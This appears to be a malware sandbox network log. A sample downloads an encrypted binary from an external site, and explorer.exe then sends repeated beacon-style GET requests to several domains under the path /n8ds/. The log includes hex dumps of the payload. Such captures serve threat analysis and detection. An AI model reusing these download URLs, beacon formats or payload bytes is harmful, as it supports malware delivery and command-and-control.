                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:07:17.304024935 CET | 6413 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:17 GMT
                                                                                                                                                    Content-Type: text/html; charset=gbk
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.6.40
                                                                                                                                                    Location: /404.html
                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.11.20 | 49816 | 35.244.144.199 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:07:22.543446064 CET | 6414 | OUT | GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1
                                                                                                                                                    Host: www.gdav130.xyz
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
Nov 29, 2021 14:07:22.843972921 CET | 6415 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.14.0
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:07:22 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 5379
                                                                                                                                                    Last-Modified: Fri, 30 Apr 2021 06:44:28 GMT
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    ETag: "608ba74c-1503"
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.25.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,
                                                                                                                                                    Nov 29, 2021 14:07:22.844050884 CET6417INData Raw: 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 e8 84 9a e6 9c ac 2e 2e 2e 22 29 2c 77 69 6e 64 6f 77 2e 5f 68 6d 74 3d 77 69 6e 64 6f 77 2e 5f 68 6d 74 7c 7c 5b 5d 3b 63 6f 6e 73 74
                                                                                                                                                    Data Ascii: e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n){(new Image).src=n}function reportLoading(n){n=n|
                                                                                                                                                    Nov 29, 2021 14:07:22.844106913 CET6418INData Raw: 6c 61 63 65 28 2f 25 32 30 2f 67 2c 22 2b 22 29 2c 73 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 2f 2f 74 72 61 63 6b 2e 75 63 2e 63 6e 2f 63 6f 6c 6c 65 63 74 22 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 26 22 29 2e 63 6f 6e 63
                                                                                                                                                    Data Ascii: lace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(o()||a())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android"
                                                                                                                                                    Nov 29, 2021 14:07:22.844146967 CET6418INData Raw: 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 65 3d 71 73 4c 69 73 74 5b 69 5d
                                                                                                                                                    Data Ascii: rch||"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=t
                                                                                                                                                    Nov 29, 2021 14:07:22.857911110 CET6420INData Raw: 72 75 65 22 3d 3d 3d 65 29 7b 76 61 72 20 24 68 65 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65
                                                                                                                                                    Data Ascii: rue"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js")
                                                                                                                                                    Nov 29, 2021 14:07:22.857976913 CET6420INData Raw: 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 61 64 22 3e e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2
                                                                                                                                                    Data Ascii: v class="no-ad"></div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.cb2b0f54365b00b5316b.js"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.11.20 | 49817 | 216.172.172.87 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:07:39.005892992 CET | 6421 | OUT | GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1
Host: www.dietatrintadias.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:07:39.161941051 CET | 6423 | IN | HTTP/1.1 404 Not Found
Date: Mon, 29 Nov 2021 13:07:39 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Tue, 23 Jul 2019 14:50:08 GMT
Accept-Ranges: bytes
Content-Length: 2361
Vary: Accept-Encoding
Content-Type: text/html
Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domínio Grátis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120">


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.11.20 | 49818 | 88.99.22.5 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:07:44.205419064 CET | 6425 | OUT | GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1
Host: www.helpcloud.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:07:44.220025063 CET | 6425 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 29 Nov 2021 13:07:44 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.helpcloud.xyz:443/n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.11.20 | 49819 | 172.120.157.187 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 29, 2021 14:07:49.612411022 CET | 6426 | OUT | GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1
Host: www.stylesbykee.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 29, 2021 14:07:49.774852991 CET | 6427 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 29 Nov 2021 13:07:45 GMT
Content-Type: text/html
Content-Length: 801
Connection: close
                                                                                                                                                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></head><body><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></body></html>


HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49807 | 20.124.109.2 | 443 | C:\Users\user\Desktop\BL_CI_PL.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-29 13:05:26 UTC | 0 | OUT | GET /Newfile/bin_UFDek247.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: bgreenidaho.com
Cache-Control: no-cache
2021-11-29 13:05:26 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Mon, 29 Nov 2021 13:05:26 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2021 09:03:01 GMT
Accept-Ranges: bytes
Content-Length: 167488
Connection: close
Content-Type: application/octet-stream
                                                                                                                                                    Data Ascii: >N7z.,M>bE"|v[fvu'B5n g8Ez~y_b]9@zs?A}G7l|v!o-J}'EiWa41%'-M?quK[lc>{-|d0.'\bdCKB>>_YL5&1Et$;iv?-<r+
                                                                                                                                                    2021-11-29 13:05:26 UTC62INData Raw: 60 a7 5b 06 5b 49 cb 43 ab 3f fb 81 2b 60 43 16 d2 54 c1 1e 5d d5 e6 fc a4 a6 f1 11 c4 10 79 15 6f 95 81 bb a8 58 29 6e e6 00 cc 98 a3 9d a0 6e 90 56 81 89 8f 85 b4 b5 03 2d 4a 47 bf 7d f5 36 6c 7c 91 cf 29 6f 42 7c a8 99 5c 25 c2 69 e1 4d 49 b6 a2 aa 84 42 79 dd 87 3a 49 8f 5a ff 9c 79 e5 10 dc f9 e2 cc 3f 77 1d 49 dd 16 da 61 d0 4a 3f d7 52 80 f9 e6 09 6f d3 cb 97 04 2c f2 9b 22 46 7e aa 52 6c fe 18 5b bc 8b e3 19 44 18 4b 93 6f 0d b7 0b 25 18 4c d3 29 8f 6b c8 24 0a 0f 72 94 46 6a 40 cb 80 27 f8 d3 f9 09 da 58 c5 d4 c9 d8 d0 bc 73 8b fc 2b 93 71 f3 f3 4e e5 0e 0f a9 ba fe 30 7e 09 b5 53 27 a4 73 28 cc b0 a9 c4 de e3 9b 96 c1 86 af de 7d 13 89 91 5f 88 da a5 f7 bc ed bb 2a b3 99 08 f3 26 61 7a 47 77 57 6f 41 a0 b2 4a a8 7a b2 71 00 07 44 36 a8 71 a2 27
                                                                                                                                                    Data Ascii: `[[IC?+`CT]yoX)nnV-JG}6l|)oB|\%iMIBy:IZy?wIaJ?Ro,"F~Rl[DKo%L)k$rFj@'Xs+qN0~S's(}_*&azGwWoAJzqD6q'
                                                                                                                                                    2021-11-29 13:05:26 UTC70INData Raw: ee 55 0c a3 fd c1 f8 2d 0c b1 85 d7 27 09 d2 b6 6c 58 23 cb 3f 99 ff cf a2 f8 12 2c ec 53 16 bc b3 9a df 65 be b2 8f d4 70 20 df 52 80 c0 a5 0d ad 27 de 50 de 7c a4 1b 40 e4 82 37 bb a8 88 9d c8 9e 5b 29 84 54 c0 91 6c 3e 31 60 ea 9b f3 3e 15 2c ed 35 13 07 12 0c f1 84 45 97 7f 40 78 7e 6e 51 9d f1 32 8e 06 82 42 20 95 2a c9 ea ba c7 12 0d c8 68 13 a6 be 6f a7 34 fd e2 f6 84 30 ab 51 1e 84 12 69 bf b5 1f 05 68 ce ce 26 0b 3d 23 d1 ba 30 1b 93 77 21 30 37 b2 a4 ee 8b c7 83 3f 30 81 50 eb df 54 ea 87 eb d4 a1 cb ac 8c 36 71 00 d9 87 21 3f c2 5f 4d 6b e2 4a f7 1c 69 8c f1 8b cd fd cf 85 83 12 c9 0a 38 82 5f 9a b3 c6 a0 36 03 52 12 83 7a ce 57 3a 81 95 4a 23 8a a5 c6 d6 09 18 ce 7f 30 3d 0c 7c 0e cd 0e 30 bc bd 6a fe af ae 52 e0 f9 7a 8f 7f c6 53 db db 4f 8a
                                                                                                                                                    Data Ascii: U-'lX#?,Sep R'P|@7[)Tl>1`>,5E@x~nQ2B *ho40Qih&=#0w!07?0PT6q!?_MkJi8_6RzW:J#0=|0jRzSO
                                                                                                                                                    2021-11-29 13:05:26 UTC78INData Raw: b3 6c 3e 58 96 32 57 e8 e3 03 bf d5 67 12 97 bf c7 bf 6c 44 94 68 12 a3 b8 76 d3 4b ee da 58 16 46 72 28 1b 92 07 37 d4 c7 94 f2 37 68 86 cd 25 75 af eb b3 3d a7 61 6d 68 59 a2 80 0d 65 64 10 23 1a a2 c1 1a 35 f4 a8 dc d0 65 8d 3b 3a 22 d9 08 58 b4 2e 2e b5 e4 30 55 30 81 8a c6 c7 f8 6f ad 14 7b 08 23 42 6c b1 71 8b 5b 43 37 28 40 ee 27 69 3b e7 9f 0c ad bc 23 50 d6 89 d5 27 10 c7 d8 94 b6 f9 91 10 6b 45 e7 f7 88 86 99 2f fa ce 57 b9 10 e4 b6 68 44 41 22 bb 09 4b ca 1a f3 e1 5c f7 e0 99 c5 e2 ad 86 e1 9b ff ae 56 3b ec 37 31 85 b7 ab 33 d5 ba 08 aa d8 a2 50 e8 d9 89 4f 6b 7b 66 06 6a d1 88 48 7e 1f 20 8c 40 29 66 2a ae 23 e8 f0 7f 12 9f 89 23 67 71 e5 ed a2 e7 0d 38 6d 2f c7 8f fa 7f a3 7f 30 68 c1 a8 b1 34 3a 99 2c 41 a7 4f 37 84 1c 50 0e 54 f6 a4 c6 32
                                                                                                                                                    Data Ascii: l>X2WglDhvKXFr(77h%u=amhYed#5e;:"X..0U0o{#Blq[C7(@'i;#P'kE/WhDA"K\V;713POk{fjH~ @)f*##gq8m/0h4:,AO7PT2
                                                                                                                                                    2021-11-29 13:05:26 UTC86INData Raw: dc cf d1 bb 9b 53 27 e7 6a d2 9d a9 77 5e 8f 69 27 e9 cf 85 45 a6 df b5 f9 cb 1c 29 70 7c b6 29 e0 12 d6 a6 7e a5 00 89 26 be 7b f2 da 1a 49 7e e0 53 bb 5b 64 1a c7 c5 ec 68 7a cf c8 0b 9d 99 3c 50 70 23 2e d1 3a fc 4b a4 70 ad ce 1c ee 1a 5a cc ae ce 93 c2 a0 c9 d8 d3 d8 01 81 3f 92 21 82 42 f7 00 6f f1 ee 00 22 a3 06 a4 b3 cc 43 3a 9e 2f 63 d3 52 05 ff d2 e6 c4 94 97 9a a1 3d 56 d6 61 af 08 55 49 5e 42 fb c1 54 68 5e 6c ce 27 91 64 4c 83 bb 88 d6 6e 93 bc 17 ef 38 5a 31 c4 cf a9 8b c3 e8 66 8a 6f 11 43 10 6a 18 5e 45 19 fd 17 35 7e f3 54 bf ea e2 21 19 12 2d bd 29 44 5a 2e 9f 04 86 bc 4f 49 3f 9a 8c 6d ae 85 a0 54 7e 92 9d ff 2b 42 f4 45 72 42 11 04 1f 3e 57 a8 a7 e2 04 35 fc 20 78 19 ef 52 da d4 d9 22 e2 e5 ff 17 fb 70 ec d9 e2 a5 68 5c 53 c7 45 4e b3
                                                                                                                                                    Data Ascii: S'jw^i'E)p|)~&{I~S[dhz<Pp#.:KpZ?!Bo"C:/cR=VaUI^BTh^l'dLn8Z1foCj^E5~T!-)DZ.OI?mT~+BErB>W5 xR"ph\SEN
                                                                                                                                                    2021-11-29 13:05:26 UTC94INData Raw: 70 bb 5b 50 eb b8 4a 55 27 2d 00 43 f6 21 9b c0 3f 5f 08 94 b1 bf 3d 1d c7 d3 3d 1d e9 f5 ec a5 78 99 98 66 e7 04 52 f5 fb e0 6b 95 4a fd d4 37 f3 88 2d 6b 0d 74 9c 71 29 9a 78 48 a9 ca 0f 4a 28 b1 92 5f 7b ec 5d a4 52 1f c3 cd b7 1a 9b 64 db c0 17 9f 2a 1e 42 60 93 3b b9 cf c6 fb 2e e9 ee 2e ef 96 97 37 58 ee a3 12 07 0c 05 8c 1a 31 2c 95 c9 94 f4 ca d2 53 17 89 ba 81 27 92 b6 38 e7 0c 78 f8 d8 00 20 b2 07 1f eb 5a 9a 76 b9 30 0f 8e 1f b1 6f a4 e5 4f e0 c3 b7 07 5d 6a a7 82 9a 28 4b c2 b7 6a 3a e7 4f 8b 78 bc dc a2 99 86 ec 79 97 c6 fc 0a f4 ab 95 44 78 4e e9 7f 39 d4 f9 10 a7 68 4c f0 be 9b fa 4c 44 91 6e 8f 17 17 9e fa 89 22 75 89 22 5a 67 ba f6 5b 13 e5 57 de fd 56 9f 51 94 4b 68 fd 8a fd 03 09 0e 4e f5 b1 ac 8b 71 2a 63 00 a7 34 e4 90 02 4f 45 09 c4
                                                                                                                                                    Data Ascii: p[PJU'-C!?_==xfRkJ7-ktq)xHJ(_{]Rd*B`;..7X1,S'8x Zv0oO]j(Kj:OxyDxN9hLLDn"u"Zg[WVQKhNq*c4OE
                                                                                                                                                    2021-11-29 13:05:26 UTC101INData Raw: 2d 14 5c a0 88 2c 26 05 bf d4 1b 5c f7 6f 4d 51 f7 97 f8 1b 91 21 91 23 be ec 28 fb f7 55 0d 2c 54 35 97 b5 d8 80 cb 67 2d 96 76 27 5c 29 9b 0e 9e d7 30 af e6 c0 6d dc 28 39 c0 c2 43 75 9a 6d 0d d8 fe 1f 50 d0 fb c7 4a 8b 76 db 69 35 e8 e7 4d 4a aa 3b f6 83 95 58 e8 00 3a 3e 0f ce 8a f4 29 3b 21 07 f1 16 08 8f d1 65 b4 32 73 08 00 5e df 13 0f 4b 66 b7 33 d1 f8 b6 aa a4 89 12 85 73 47 6d a4 65 57 1a 95 20 c8 2c 39 52 8c 2c 49 b1 2e 74 81 b4 ad 82 a3 33 36 7d d0 50 27 bb 90 b4 31 30 1a ab 01 43 54 57 18 ee 8e 67 b4 2d 6f 07 7a f7 ec 84 6e 44 d7 e6 c2 5e d1 91 e1 96 1c d1 91 b1 d6 33 58 69 f7 bf 27 b9 e1 e9 c3 91 99 e9 56 c0 8a ef 60 13 e9 47 07 4d c7 63 69 38 32 77 7d c2 b1 95 2b a3 28 45 92 39 e0 88 78 3d a8 9b 1a cc f2 3f 43 b9 30 a7 b7 43 af 01 1e a5 e8
                                                                                                                                                    Data Ascii: -\,&\oMQ!#(U,T5g-v'\)0m(9CumPJvi5MJ;X:>);!e2s^Kf3sGmeW ,9R,I.t36}P'10CTWg-oznD^3Xi'V`GMci82w}+(E9x=?C0C
                                                                                                                                                    2021-11-29 13:05:26 UTC109INData Raw: 72 5b 90 44 65 8e 70 a6 f5 45 65 e3 64 29 97 e7 86 b3 d6 21 49 61 d6 41 f2 25 cf ff 87 be b8 cb 71 58 18 2b d8 aa 72 cc 0b 54 cc 85 16 98 ab 3c 57 56 3f ef 58 81 90 69 75 63 89 a4 65 57 91 fb 7a 8e 09 06 85 c9 d2 97 6f f2 9c 5b 95 00 cb a0 e5 64 a6 78 37 40 01 93 bc b0 c0 14 2b 7c 8f 3a 5f cf 09 d0 63 e7 6f 62 4a 7c 5f e5 60 ed 52 8c 81 a5 cd a4 99 b6 4d 0a 09 3a 1f d5 47 9e 51 70 26 c4 03 65 4a 62 5d 69 97 09 9e 01 81 78 28 e9 48 f7 4f d7 93 b2 46 f4 ad 5a d6 24 84 a0 73 28 ff 86 bc 54 b9 e6 ff ed 04 0f 7f 62 79 90 87 2d d5 3a 9b 34 57 10 80 c0 9d 29 08 5f 47 65 09 de 49 d8 31 b4 2a d3 31 4c 5c 70 34 9d 09 e1 16 70 15 85 3c 2d 2c 0c bd c6 72 bf af e2 87 fb f0 de 24 c5 0b 02 18 d8 8e cd c8 57 3f 6a fe fe 78 ce fc 52 34 5a 9d fb 1a e4 4c 17 89 83 44 aa 26
                                                                                                                                                    Data Ascii: r[DepEed)!IaA%qX+rT<WV?XiuceWzo[dx7@+|:_cobJ|_`RM:GQp&eJb]ix(HOFZ$s(Tby-:4W)_GeI1*1L\p4p<-,r$W?jxR4ZLD&
                                                                                                                                                    2021-11-29 13:05:26 UTC117INData Raw: 5c 0c a5 98 d0 d0 54 59 cb bb be 7e 18 89 2c 1c 93 c0 b7 24 91 eb 09 c8 e9 c9 b3 0c 54 70 e4 fa 6d b0 0e e4 ac 80 66 12 80 82 3b 85 b9 19 69 95 d4 08 90 16 d5 47 de 7d 7c f7 2b 30 f4 d2 6c 5c ed 61 de 29 01 86 da 14 a1 ef 0b c4 82 9f ba 86 52 74 80 b6 bc 83 d1 6e 54 c4 49 d1 94 cc f5 74 f0 d3 24 74 2d e5 23 36 b8 45 48 3f a8 e1 9b 65 9d 5e fa 8e 23 42 f9 1a dd dc dc cb c0 99 80 cd c1 18 e0 3c c6 04 02 eb f0 ca 5c 83 52 09 19 bd fa 4b 50 2c 26 8b 90 e1 51 7b 33 8a a6 84 6e 05 28 95 94 b4 17 c8 a4 fe 64 88 7d 5d b6 8d f9 1a bc d9 4c c8 63 ca 20 cf a3 18 7d c5 f6 58 a8 b9 87 a9 4a f8 07 bc 20 5c f6 1c 12 54 b2 52 d2 5e ab e5 9e 40 03 a9 02 4b 60 0a 06 0d 21 cd 43 36 8f c5 db 44 a7 7e 80 af 4f c6 70 ae 10 53 13 ea 16 09 64 8d 8f 84 0a 05 c1 36 19 2d 47 99 b9
                                                                                                                                                    Data Ascii: \TY~,$Tpmf;iG}|+0l\a)RtnTIt$t-#6EH?e^#B<\RKP,&Q{3n(d}]Lc }XJ \TR^@K`!C6D~OpSd6-G
                                                                                                                                                    2021-11-29 13:05:26 UTC125INData Raw: e8 ef 0b ca 5f b4 de 88 fe 11 09 a0 0b 67 e1 0a 04 80 80 1f 84 15 a5 18 ce a2 ac 07 db 7c a1 00 61 f9 e2 16 9b 09 02 52 4a 42 34 0d 69 5f 8e 88 ab ca 09 d2 0e e6 46 d2 7b 5c e6 c7 93 b9 ea 1a bb da df 61 9d ba 92 7f 39 73 5c ad 63 97 ef 83 b0 ae 44 ed 85 1e 00 53 78 ff ed 38 5a 52 27 da 53 60 4e ce b1 e1 d4 ec 11 0c ba 69 fa 67 40 71 82 ae 05 89 a6 02 5f c8 32 aa 75 c6 df 12 6b 07 2e 78 ba 0b 39 db 10 f4 89 2d e5 b6 1b ca f7 8e 48 a8 18 96 cf 7f d6 e0 52 4d 38 47 a8 dd 79 be 0e ca 5a ea 80 63 b3 87 0f 7c b8 34 0c c4 f0 f8 9e 95 80 34 14 18 74 10 49 a4 ec a4 7a ed 98 1b d3 65 eb 9b cc d5 56 66 94 f8 29 14 25 92 f8 b6 ff 28 85 6b f8 30 e1 13 d2 9d 2c ec e2 18 c9 e0 8b fd b9 2e f1 7b 3b 0f b2 10 bf 76 41 d2 dc 75 b6 a0 19 9f 4b b2 62 68 7c 5d 2b 70 ec c2 37
                                                                                                                                                    Data Ascii: _g|aRJB4i_F{\a9s\cDSx8ZR'S`Nig@q_2uk.x9-HRM8GyZc|44tIzeVf)%(k0,.{;vAuKbh|]+p7
                                                                                                                                                    2021-11-29 13:05:26 UTC133INData Raw: 03 61 ab b3 e6 13 ca ab 03 8f 95 5c 2e e3 b5 72 2e 99 4e 75 28 2d 6a e3 ac af 03 98 b0 de b0 12 92 04 54 d1 5b ab 26 4d 01 4e 47 1d 79 97 78 a6 1f bd 1f e5 30 d8 d9 2f 0c 9c 12 56 ed cb c6 a7 aa be de e8 6d 3b 39 eb ac d0 ad d5 46 89 fa e9 90 f3 61 c9 ff 06 de d3 14 27 15 60 12 31 c5 90 88 c5 ae 36 7a ef 73 6b 9b 32 ec 42 47 f0 2c 13 82 97 d4 a9 bc 91 4a fa 04 c1 b5 b4 26 f8 20 a7 c0 5f da 90 78 1c d4 6c 1c 2b b3 70 a9 58 78 14 cd 9b 75 d3 4d 1f 40 75 53 42 71 b8 70 72 53 9c d2 04 c2 0b aa 70 b7 42 19 87 70 c3 1c 82 4f fe bb 3e 74 bc 54 b5 c3 24 12 e0 88 92 03 65 7d 08 0d 58 82 98 db eb 22 3f f8 ee a1 bb 4e 34 be 55 da ca c5 61 2b c4 1e 4b 45 11 b9 e5 cd e3 bb 2c 14 17 7c b5 70 b9 18 05 fa 67 d4 b6 81 8e 2a e7 6d 85 ed fa 5c 7c 91 fa d7 81 70 4b 0f a4 42
                                                                                                                                                    Data Ascii: a\.r.Nu(-jT[&MNGyx0/Vm;9Fa'`16zsk2BG,J& _xl+pXxuM@uSBqprSpBpO>tT$e}X"?N4Ua+KE,|pg*m\|pKB
                                                                                                                                                    2021-11-29 13:05:26 UTC140INData Raw: 24 6b b9 9c 18 4a ed d6 92 c7 13 48 f9 66 09 7b eb eb 5d 94 b3 93 c5 79 7b df 15 70 58 ea 64 89 f2 20 9b e6 cb d7 17 09 f2 2e a4 6b 2e bf a8 cc 2f 74 a7 c2 b5 3d f1 57 86 3a f2 39 df 10 61 18 fa 5c 56 17 70 87 bd c2 92 5e da 97 ec 20 0a 03 20 98 cd b8 b3 87 55 81 3a 15 3a f4 97 6a 71 3d c8 da 12 24 30 45 63 23 87 4e fa 56 79 b3 32 94 95 91 76 e2 70 30 2c bd 86 4e b0 03 17 6d 76 4f 11 a6 18 28 41 d1 cc ba ee 83 13 08 ff 41 69 c7 5b 69 1e 4b 1f b3 35 5c 02 6e 38 d2 26 a0 e7 df b8 78 00 72 55 5e 54 11 42 bd f3 9e 34 f6 44 44 8c 33 f2 7d ae 52 22 4d 58 bc 1a 52 22 46 13 17 e6 77 82 3b 50 f0 7d de c7 ba 20 23 59 07 e9 9f 7e f1 55 2f 63 18 f8 18 78 2e fc bb a2 22 81 99 6c 58 d6 fb a7 99 3f 6a 25 7f 5e 0d c4 98 1c 23 05 1f 0b 5a 16 ea 1c d3 db e6 2e d6 f7 c3 2c
                                                                                                                                                    Data Ascii: $kJHf{]y{pXd .k./t=W:9a\Vp^ U::jq=$0Ec#NVy2vp0,NmvO(AAi[iK5\n8&xrU^TB4DD3}R"MXR"Fw;P} #Y~U/cx."lX?j%^#Z.,
